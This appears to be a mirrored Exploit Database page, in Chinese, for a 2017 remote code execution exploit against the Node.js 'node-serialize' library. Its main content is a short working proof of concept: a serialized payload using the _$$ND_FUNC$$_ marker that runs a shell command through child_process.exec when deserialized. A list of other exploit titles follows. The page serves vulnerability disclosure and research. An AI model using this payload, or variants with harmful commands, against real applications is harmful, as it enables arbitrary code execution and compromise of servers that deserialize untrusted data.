Node.JS – ‘node-serialize’ Remote Code Execution

Exploit Database
103 阅读

作者： OpSecX

日期： 2017-02-08
类别：
- remote
平台：
- linux
来源：https://www.exploit-db.com/exploits/45265/

var serialize = require('node-serialize');

var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';

serialize.unserialize(payload);

last Exploits
Node.JS – ‘node-serialize’ Remote Code Execution的更多信息

Google Android 2.0/2.1 – Use-After-Free Remote Code Execution on Webkit：
Java Deployment Toolkit – Performs Insufficient Validation of Parameters：
Oracle WebLogic Server 10.3.6.0.0 / 12.x – Remote Command Execution：
Geovision Inc. IP Camera/Video/Access Control – Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access：
SysGauge Server 3.6.18 – Remote Buffer Overflow：
GroundWork – ‘monarch_scan.cgi’ OS Command Injection (Metasploit)：
HomeMatic Zentrale CCU2 – Remote Code Execution：
Quick TFTP Server Pro 2.1 – Transfer-Mode Overflow (Metasploit)：